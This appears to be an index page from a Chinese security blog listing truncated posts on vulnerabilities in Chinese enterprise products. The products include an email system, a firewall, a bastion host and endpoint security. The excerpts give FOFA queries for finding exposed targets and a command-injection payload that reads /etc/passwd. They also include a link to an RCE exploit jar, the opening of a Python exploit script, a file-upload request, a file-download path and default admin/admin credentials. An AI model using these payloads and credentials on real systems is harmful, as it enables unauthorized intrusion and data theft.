描述
fofa body=”亿邮电子邮件系统”
POC & 利用
POST /webadm/?q=moni_detail.do&action=gragh
type='|cat /etc/passwd||'
...
Adminxe
4年前 (2021-04-17) 7049℃ 0评论
6喜欢
描述
fofa app=”网康科技-下一代防火墙”
利用
利用jar包: https://github.com/Yang0615777/PocList/blob/main/QiAnXin-WangKangFirewall-RCE...
Adminxe
4年前 (2021-04-17) 4447℃ 0评论
6喜欢
描述
齐治堡垒机某版本任意用户登录.md
fofa app=”齐治科技-堡垒机”
POC & EXP
import requests,sys,re,urllib3
urllib3.disable_warnings(url...
Adminxe
4年前 (2021-04-17) 6030℃ 0评论
9喜欢
描述
登录处抓包,然后闭合username字段重发引发报错
fofa title=”TSCEV4.0″
POC & 利用
# POC测试(出现 root:x:0:0 则存在漏洞)
op=login&userna...
Adminxe
4年前 (2021-04-17) 2846℃ 0评论
6喜欢
描述
金山 V8 终端安全系统 存在默认弱口令,攻击者可以获得全部主机权限
POC & 利用
默认口令为 admin/admin
转载请注明:Adminxe's Blog » 金山 V8 终端安全系统_弱口令漏洞...
Adminxe
4年前 (2021-04-17) 2362℃ 0评论
7喜欢
描述
存在某接口可被攻击者利用上传文件
利用
上传
POST /Upload/upload_file.php?l=test HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10...
Adminxe
4年前 (2021-04-17) 2164℃ 0评论
6喜欢
描述
系统存在弱口令和任意文件下载漏洞
fofa “深圳银澎云计算有限公司”
POC & EXP
# 弱口令
admin/admin
任意文件下载
/register/toDownload.do?fileName=敏感...
Adminxe
4年前 (2021-04-17) 5172℃ 0评论
8喜欢